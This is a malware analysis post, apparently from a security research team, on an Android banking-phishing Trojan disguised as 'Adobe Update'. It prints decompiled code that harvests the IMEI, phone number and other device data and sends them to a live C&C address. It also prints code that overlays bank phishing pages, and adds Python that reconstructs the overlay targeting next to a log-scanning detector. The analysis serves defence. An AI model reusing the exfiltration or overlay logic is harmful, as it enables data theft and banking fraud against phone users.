— Trustlook Research Team
Smartphones have reached every corner of the world. After years of rapid growth, their popularity and usefulness now rival those of personal computers. Beyond calling and texting, more and more people do their daily banking on their phones. With that computing capability, traditional malware is moving onto smartphones: it compromises the device, changes the phone's behaviour, and takes instructions from a remote attacker to steal the user's information.
One such example is a newly discovered malicious app named "Adobe Update", with the package name "droid.invisible". It is a phishing Trojan that targets the Android platform.
The sample's MD5 is D8616CDD54154B06A5E4D9D5B2A605E5.
The package icon is:

On VirusTotal, only 3 of 57 antivirus vendors detected the sample when it was first submitted.

The malware hides behind a reputable enterprise: the developer certificate it is signed with carries that company's name in its subject fields. Anyone can put any name into a self-signed certificate, so the subject name proves nothing about the signer; only the certificate's fingerprint (or public key) does, and it should be compared against the one on the developer's Play-distributed builds rather than trusted by name:

The official com.adobe.reader app on Google Play, by contrast, is signed with the genuine developer certificate:

Upon installation, the malware shows the user a misleading setup dialog while making itself the default SMS app:

The app displays messages enticing the user to grant it device administrator rights, which it uses to persist on the system:

With device administrator rights held, the app cannot be uninstalled by normal means; the privilege has to be revoked in the device administrator settings before an uninstall will succeed:

The app communicates with a remote server and sends out the following personal and device information:
- Country
- Device model
- IMEI
- Network operator
- Cell phone number
- Malware bot ID
- OS version
- Device name
- OS API level

The following decompiled snippet, from a Runnable started by the gate service, shows the data collection and upload:
class a implements Runnable
[...]
    Thread.sleep(20000L);                                   // wait 20 seconds after start
    Log.d("INVISIBLE-LOG", "[GATE SERVICE] - SEND MOBILE DATA");
    a.a.a.a.a locala = new a.a.a.a.a();                     // obfuscated HTTP client
    x localx = new x();                                     // obfuscated request parameters
    TelephonyManager localTelephonyManager = (TelephonyManager)this.a.getSystemService("phone");
    localx.a("id", localTelephonyManager.getDeviceId());                 // IMEI
    localx.a("country", localTelephonyManager.getNetworkCountryIso());   // country
    localx.a("opname", localTelephonyManager.getNetworkOperatorName());  // network operator
    localx.a("osversion", System.getProperty("os.version") + "(" + Build.VERSION.INCREMENTAL + ")");  // OS version
    localx.a("osapilevel", Build.VERSION.RELEASE + "(" + Build.VERSION.SDK_INT + ")");               // OS API level
    localx.a("device", Build.DEVICE);                                    // device name
    localx.a("model", Build.MODEL + " (" + Build.PRODUCT + ")");         // device model
    localx.a("pnumber", localTelephonyManager.getLine1Number());         // phone number
    localx.a("botid", "777");                                            // hard-coded bot ID
    locala.a("http://94.140.120.183/gate/receive.php", localx, new b(this));  // send everything to the C&C
[...]
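As an added example (not code from the sample or from Trustlook), the Python below scans a constructed proxy log for the beacon shown above: a POST to /gate/receive.php or to the sample's C&C address whose body carries the same nine field names, including the hard-coded botid. The field names, path and C&C address come from the decompiled snippet; the log format, client addresses, operator, phone number and the 203.0.113.9 host are constructed for the example, and the IMEI is the standard Luhn-valid test value.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the decompiled gate service above.
C2_HOST = "94.140.120.183"
BEACON_PATH = "/gate/receive.php"
BEACON_FIELDS = {"id", "country", "opname", "osversion", "osapilevel",
                 "device", "model", "pnumber", "botid"}

# Constructed proxy log, one request per line:
#   <timestamp> <client> <method> <url> <body or "-">
# Client addresses, operator, phone number and the 203.0.113.9 host are made up;
# the IMEI is the standard Luhn-valid test value 490154203237518.
SAMPLE_LOG = """\
2016-01-12T10:02:11Z 10.0.0.5 POST http://94.140.120.183/gate/receive.php id=490154203237518&country=lv&opname=LMT&osversion=3.4.0(123)&osapilevel=4.4.2(19)&device=hammerhead&model=Nexus+5+(hammerhead)&pnumber=%2B37120000000&botid=777
2016-01-12T10:02:30Z 10.0.0.5 GET http://www.example.org/index.html -
2016-01-12T10:03:02Z 10.0.0.7 POST http://203.0.113.9/gate/receive.php id=1234&botid=777
2016-01-12T10:04:45Z 10.0.0.9 POST http://www.example.org/search q=android+update
"""


def luhn_ok(digits: str) -> bool:
    """Luhn check over a 15-digit IMEI (what getDeviceId returns on GSM phones)."""
    if not re.fullmatch(r"\d{15}", digits):
        return False
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:                    # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def classify(line: str):
    """Return (client, verdict, reasons) for a suspicious request, None otherwise."""
    _ts, client, method, url, body = line.split(maxsplit=4)
    parts = urlsplit(url)
    params = parse_qs(body, keep_blank_values=True) if method == "POST" else {}
    fields = set(params)
    reasons = []
    if parts.hostname == C2_HOST:
        reasons.append("known C&C address")
    if parts.path == BEACON_PATH:
        reasons.append("gate/receive.php path")
    if BEACON_FIELDS <= fields:           # the full field set the gate service sends
        reasons.append("full beacon field set")
        if luhn_ok(params["id"][0]):
            reasons.append("id is a Luhn-valid IMEI")
    elif "botid" in fields:
        reasons.append("botid field present")
    if not reasons:
        return None
    network_match = parts.hostname == C2_HOST or parts.path == BEACON_PATH
    verdict = "beacon" if network_match and "full beacon field set" in reasons else "suspicious"
    return client, verdict, reasons


def scan(log: str):
    """Run classify() over every log line and collect the hits in order."""
    hits = []
    for line in log.splitlines():
        if line.strip():
            result = classify(line)
            if result is not None:
                hits.append(result)
    return hits


if __name__ == "__main__":
    for client, verdict, reasons in scan(SAMPLE_LOG):
        print(client, verdict, "; ".join(reasons))
```

The field set and the botid value are the durable part of this signature: the C&C address can change between builds, so a request carrying all nine parameter names to a receive.php path is reported as a beacon even when it goes to a host that is not yet on a blocklist, while a partial match is only flagged as suspicious for an analyst to look at.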
Furthermore, the malware receives commands from the C&C server and acts on them:
- loop // wait for the next command
- sms // send an SMS message
- readsms // read stored SMS messages and send them to the C&C server
- ion // not implemented, only writes to the log
- ioff // same as above
- recall // call the received numbers
- fish // show an attacker-controlled web page when a specified app is running in the foreground
The following snippets show how the malware checks the received command and brings up the phishing web page:
if (paramArrayOfByte[0].equals("fish"))   // compare the command name
{
    Log.d("INVISIBLE-LOG", "[GATE SERVICE] :: FISH");
    // hand the command payload to the scanner service as the "data" extra
    this.b.a.startService(new Intent(this.b.a, InjectionScanner.class).putExtra("data", paramArrayOfByte[1]));
}
[…]
public class InjectionScanner extends Service
{
    int a = 0;      // set to 1 once the overlay activity has been launched
    String b;       // command payload received as the "data" extra

    public String a()
    {
        // name of the foreground process: first entry of the running-process list
        return ((ActivityManager.RunningAppProcessInfo)((ActivityManager)getSystemService("activity")).getRunningAppProcesses().get(0)).processName;
    }

    public void a(String paramString)
    {
        // run the scanner (class g) on a daemon thread with the payload
        Thread localThread = new Thread(new g(this, paramString));
        localThread.setDaemon(true);
        localThread.start();
    }
[...]
    public int onStartCommand(Intent paramIntent, int paramInt1, int paramInt2)
    {
        this.b = paramIntent.getStringExtra("data");   // payload from the fish command
        a();
        a(this.b);
        return paramInt1;
[...]
// inside the scanner thread g: i iterates over the keys (bank labels) of the received JSON object,
// j over the package names in that key's "apps" array
if (this.b.a().equals(localJSONObject.getJSONObject(localJSONObject.names().getString(i)).getJSONArray("apps").getString(j)))   // compare the foreground process name with a received package name
{
    Intent localIntent = new Intent(this.b, InjectionActivity.class);
    localIntent.addFlags(268435456);                                          // FLAG_ACTIVITY_NEW_TASK
    localIntent.putExtra("injection", localJSONObject.names().getString(i));  // pass the matched bank label
    this.b.startActivity(localIntent);
    this.b.a = 1;
[...]
// InjectionActivity, launched by the scanner above
@SuppressLint({"SetJavaScriptEnabled"})
protected void onCreate(Bundle paramBundle)
{
    super.onCreate(paramBundle);
    setContentView(2130968604);                                     // layout resource ID
    TelephonyManager localTelephonyManager = (TelephonyManager)getSystemService("phone");
    Intent localIntent = getIntent();
    WebView localWebView = (WebView)findViewById(2131492971);      // WebView resource ID
    localWebView.getSettings().setJavaScriptEnabled(true);
    localWebView.setWebViewClient(new f(this, null));
    localWebView.setWebChromeClient(new e(this, null));
    // load the phishing page for the matched bank, tagged with the victim's IMEI
    localWebView.loadUrl("http://94.140.120.183/injections/?bank=" + localIntent.getStringExtra("injection") + "&imei=" + localTelephonyManager.getDeviceId());
}
}
When a targeted app, for example a banking app, is in the foreground, the malware displays the phishing page in a WebView on top of it. The bank parameter selects the page for that target and the imei parameter lets the operator tie the submitted data to the device. Victims who take the page for the bank's own login form enter their financial details, which the fraudsters harvest.
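As an added example (not the sample's code or Trustlook's), the Python below reconstructs the targeting logic of the fish command: the JSON payload the decompiled loop reads, the foreground-process match, and the URL InjectionActivity ends up loading. The payload shape is inferred from the loop; its bank labels and package names, the IMEI and the sequence of foreground processes are constructed, and treating the int a = 1 assignment as a stop flag that prevents a second overlay is an assumption. One practical caveat for anyone reproducing the foreground check itself: getRunningAppProcesses() lists other apps' processes only on Android versions before 5.1.1, so this targeting no longer works as written on later releases.

```python
import json
from urllib.parse import urlencode

C2 = "http://94.140.120.183"        # C&C address from the sample
INJECTION_PATH = "/injections/"     # path InjectionActivity loads

# Constructed "fish" payload. The shape {bank label: {"apps": [package names]}} is what
# the decompiled loop reads (names()[i] -> getJSONObject -> getJSONArray("apps"));
# the labels and package names below are placeholders, not values from the sample.
FISH_PAYLOAD = json.dumps({
    "examplebank": {"apps": ["com.example.bank", "com.example.bank.tablet"]},
    "otherbank": {"apps": ["org.example.otherbank"]},
})


def select_injection(payload: str, foreground: str):
    """First bank label whose "apps" list contains the foreground process name, else None."""
    config = json.loads(payload)
    for bank in config:                                   # names().getString(i)
        for app in config[bank].get("apps", []):          # getJSONArray("apps").getString(j)
            if foreground == app:                         # equals(this.b.a())
                return bank
    return None


def injection_url(bank: str, imei: str) -> str:
    """URL the InjectionActivity WebView loads: /injections/?bank=<label>&imei=<IMEI>."""
    return C2 + INJECTION_PATH + "?" + urlencode({"bank": bank, "imei": imei})


class InjectionScanner:
    """Stand-in for the service: checks each observed foreground process, fires once.

    Assumption: the decompiled code sets the service's int field a to 1 after launching
    InjectionActivity; this simulation treats that as a "done" flag that stops the scan.
    """

    def __init__(self, payload: str, imei: str):
        self.payload = payload
        self.imei = imei
        self.fired = False

    def observe(self, foreground: str):
        if self.fired:
            return None
        bank = select_injection(self.payload, foreground)
        if bank is None:
            return None
        self.fired = True
        return injection_url(bank, self.imei)


def simulate(payload: str, imei: str, foreground_sequence):
    """Feed a sequence of foreground process names to the scanner; return the URLs it would load."""
    scanner = InjectionScanner(payload, imei)
    urls = []
    for process in foreground_sequence:
        url = scanner.observe(process)
        if url is not None:
            urls.append(url)
    return urls


if __name__ == "__main__":
    # Constructed sequence: launcher first, then two targeted apps in turn.
    for url in simulate(FISH_PAYLOAD, "490154203237518",
                        ["com.android.launcher", "org.example.otherbank", "com.example.bank"]):
        print(url)
```

Run against the constructed sequence, only the first targeted app produces a URL; the second is ignored because the scanner has already fired. For an analyst, the useful part is the payload shape: capturing the fish command from the C&C gives the full list of targeted package names, and the bank label in the URL identifies which injection page the operator serves for each of them.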
The C&C server 94.140.120.183 is located in Latvia:
http://whois.domaintools.com/94.140.120.183
